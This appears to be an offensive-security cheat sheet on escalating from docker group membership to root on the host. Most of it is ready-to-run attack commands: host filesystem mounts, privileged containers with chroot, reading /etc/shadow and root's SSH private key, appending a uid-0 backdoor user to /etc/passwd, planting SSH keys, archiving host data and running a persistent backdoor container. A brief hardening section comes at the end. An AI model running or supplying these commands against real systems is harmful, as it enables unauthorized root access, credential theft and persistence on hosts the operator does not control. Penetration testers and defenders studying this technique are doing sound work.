πDocker Container Escape
π― Overview
Docker group membership provides equivalent root access to host filesystem through container mounting and privileged container execution.
π Prerequisites
Check Docker Group Membership
# Check if user is in docker group
id | grep docker
groups | grep docker
# Example output:
# uid=1000(user) gid=1000(user) groups=1000(user),999(docker)Docker Service Status
# Check if Docker is running
systemctl status docker
docker --version
docker psπ Exploitation Methods
Method 1: Mount Host Filesystem
# Mount host root directory
docker run -v /:/mnt -it ubuntu
# Inside container, access host filesystem
cd /mnt/root # Host root directory
cat /mnt/etc/shadow # Host shadow fileMethod 2: Privileged Container
# Run privileged container with host access
docker run --privileged -v /:/hostfs -it ubuntu bash
# Change root to host filesystem
chroot /hostfs
# Now operating on host system as root
id # Should show uid=0(root)Method 3: Direct Host Shell
# Run container with host PID namespace and mount
docker run -it --pid=host --net=host --privileged -v /:/host ubuntu bash
# Access host filesystem
chroot /hostπ§ Docker Image Management
Available Images
# List available Docker images
docker images
# Search for lightweight images
docker search alpine
docker search ubuntuPull and Use Images
# Pull Ubuntu image if needed
docker pull ubuntu
# Pull Alpine (smaller)
docker pull alpine
# Use existing image
docker run -v /:/mnt -it existing_imageπ― Post-Exploitation
Host System Access
# Inside container with host mount
cd /mnt # or /hostfs depending on mount
# Read sensitive files
cat /mnt/etc/shadow
cat /mnt/root/.ssh/id_rsa
# Create backdoor user
echo 'backdoor:$6$salt$hash:0:0:root:/root:/bin/bash' >> /mnt/etc/passwd
# SSH key persistence
mkdir -p /mnt/root/.ssh
echo "ssh-rsa AAAA..." >> /mnt/root/.ssh/authorized_keys
# Copy important files
cp /mnt/etc/shadow /tmp/shadow_backup
tar czf /tmp/host_data.tar.gz /mnt/root/Escape Verification
# Verify we're on host system (not container)
hostname
cat /proc/1/cgroup
ls -la / # Should see host filesystemπ Detection & Enumeration
Quick Docker Check Script
#!/bin/bash
echo "=== DOCKER PRIVILEGE ESCALATION CHECK ==="
echo "[+] Docker group membership:"
id | grep docker && echo " [!] User is in docker group!"
echo "[+] Docker service status:"
systemctl status docker 2>/dev/null
echo "[+] Available Docker images:"
docker images 2>/dev/null
echo "[+] Running containers:"
docker ps 2>/dev/null
echo "[+] Docker version:"
docker --version 2>/dev/nullDocker Socket Check
# Check for Docker socket access
ls -la /var/run/docker.sock
# Test Docker commands
docker ps
docker imagesπ Quick Reference
Immediate Checks
# Group membership
id | grep docker
# Available resources
docker images
docker ps -aEmergency Escalation
# If Docker group confirmed
docker run -v /:/mnt -it ubuntu
# Alternative with existing image
docker run -v /:/hostfs --privileged -it image_name bash
chroot /hostfsOne-liner Escalation
# Complete Docker escalation
docker run -v /:/mnt -it ubuntu bash -c "cd /mnt/root && /bin/bash"π§ Advanced Techniques
Container Breakout
# Run with all host namespaces
docker run -it --pid=host --net=host --ipc=host --uts=host -v /:/host ubuntu bash
# Access host processes directly
ps aux | grep systemd # See host processesPersistence Methods
# Create persistent backdoor container
docker run -d --name backdoor -v /:/host --privileged ubuntu tail -f /dev/null
# Access anytime
docker exec -it backdoor bash
chroot /hostβ οΈ Defensive Considerations
Docker Security Issues
Group membership = root equivalent access
Host filesystem mounting bypasses all isolation
Privileged containers disable security features
No authentication required for group members
Hardening Recommendations
# Remove users from docker group
sudo deluser username docker
# Use rootless Docker
dockerd-rootless.sh
# Monitor Docker usage
journalctl -u dockerDocker group membership eliminates container isolation - privileged containers with host mounts provide immediate root access to the underlying host system.
Last updated